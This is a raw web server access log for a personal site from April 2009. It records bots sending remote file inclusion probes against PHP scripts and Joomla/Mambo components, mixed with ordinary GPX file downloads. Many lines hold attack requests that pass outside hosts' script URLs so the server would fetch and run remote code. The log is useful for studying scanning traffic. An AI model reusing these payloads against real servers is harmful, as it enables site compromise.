87.106.109.88 - - [28/Apr/2009:10:39:40 -0700] "GET /logs///skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:40 -0700] "GET //skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:39:41 -0700] "GET /logs/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:39:41 -0700] "GET /logs/access_090324.log/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:48 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:48 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:48 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:48 -0700] "GET /include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:51 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:51 -0700] "GET /logs/access_080702.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:51 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:39:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:39:52 -0700] "GET /logs/access_081101.log/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:39:52 -0700] "GET /logs/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:55 -0700] "GET /include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:55 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:55 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:39:55 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:39:56 -0700] "GET /logs/access_090324.log/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:56 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:56 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:56 -0700] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:39:57 -0700] "GET /logs/access_080702.log%20%20/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:40:02 -0700] "GET /logs/access_080319.log%20%20/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:40:06 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:40:06 -0700] "GET /logs/access_090126.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:40:06 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:40:09 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:40:10 -0700] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:40:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:40:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:40:32 -0700] "GET /index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 200 43303 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:40:38 -0700] "GET /logs/access_080416.log%20/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.249 - - [28/Apr/2009:10:40:39 -0700] "GET /logs/access_080924.log%20/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:40:51 -0700] "GET /index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 200 43303 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:41:21 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:41:21 -0700] "GET /logs/access_080702.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:41:22 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.104.21.154 - - [28/Apr/2009:10:41:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.104.21.154 - - [28/Apr/2009:10:41:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
206.104.21.154 - - [28/Apr/2009:10:41:29 -0700] "GET /logs/access_080323.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:41:30 -0700] "GET /logs/access_080416.log%20/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:41:30 -0700] "GET /logs/access_080924.log%20/index.php?visualizar=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:41:31 -0700] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.104.21.154 - - [28/Apr/2009:10:41:59 -0700] "GET /logs/access_080215.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:42:09 -0700] "GET /logs/access_080211.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:10:42:09 -0700] "GET /logs/access_080923.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:42:18 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:42:20 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:42:20 -0700] "GET /logs/access_080702.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [28/Apr/2009:10:42:30 -0700] "GET /logs/access_080319.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?oke=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:43:48 -0700] "GET /logs/access_081202.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:43:49 -0700] "GET /home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:43:49 -0700] "GET /logs/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:43:53 -0700] "GET /logs/access_080806.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:44:01 -0700] "GET /_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:44:01 -0700] "GET /logs/access_080829.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:44:01 -0700] "GET /logs/access_081130.log/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:10:44:01 -0700] "GET /logs/_blogadata/include/struct_main.php?incl_page=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:44:35 -0700] "GET /logs/access_080612.log%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:10:44:35 -0700] "GET /logs/access_080806.log%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:44:40 -0700] "GET /logs/access_081202.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:44:40 -0700] "GET /home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:44:40 -0700] "GET /logs/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:44:40 -0700] "GET /logs/access_080806.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:45:26 -0700] "GET /logs/access_090323.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:45:26 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:45:26 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:45:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:45:51 -0700] "GET /include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:45:51 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:45:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:45:51 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:45:52 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.103.16.43 - - [28/Apr/2009:10:46:12 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:46:17 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 200 43452 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:46:56 -0700] "GET /logs/access_090224.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [28/Apr/2009:10:47:01 -0700] "GET /logs/access_090323.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:47:10 -0700] "GET /logs/access_081202.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:47:10 -0700] "GET /logs/access_080806.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:47:59 -0700] "GET /logs/access_081202.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:10:48:00 -0700] "GET /logs/access_080806.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:48:16 -0700] "GET /logs/access_081202.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:48:16 -0700] "GET /home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:48:16 -0700] "GET /logs/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:48:18 -0700] "GET /logs/access_080806.log/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:48:25 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:33 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:33 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:48:39 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:41 -0700] "GET /logs/access_081105.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:48:47 -0700] "GET /include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:48:47 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:48:47 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:10:48:48 -0700] "GET /logs/access_080925.log//include/bbs.lib.inc.php?site_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:52 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:52 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:48:52 -0700] "GET /logs/access_081105.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.118.82.22 - - [28/Apr/2009:10:49:00 -0700] "GET /index.php?pagina=http://girlsex-total.com/bot/page.restrictor.log?? HTTP/1.1" 500 292 "-" "libwww-perl/5.810" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:49:53 -0700] "GET /logs/access_081105.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:49:53 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:49:53 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:30 -0700] "GET /logs/access_081116.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:30 -0700] "GET /logs//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:31 -0700] "GET /logs/access_080529.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:39 -0700] "GET /logs/access_081116.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:39 -0700] "GET /logs//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:40 -0700] "GET /logs/access_080529.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:50:41 -0700] "GET /logs/access_090118.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.56.170.228 - - [28/Apr/2009:10:50:45 -0700] "GET /errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.56.170.228 - - [28/Apr/2009:10:50:45 -0700] "GET /logs/access_081012.log/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.56.170.228 - - [28/Apr/2009:10:50:45 -0700] "GET /logs/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:47 -0700] "GET /logs/access_080529.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:47 -0700] "GET /logs//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:10:50:47 -0700] "GET /logs/access_081116.log//index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:50:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:10:50:56 -0700] "GET /logs/access_080806.log%20%20/home.php?pagina=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:10:51:12 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:51:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:10:51:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
24.56.170.228 - - [28/Apr/2009:10:51:14 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.sanbokyodan.fr/editor/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
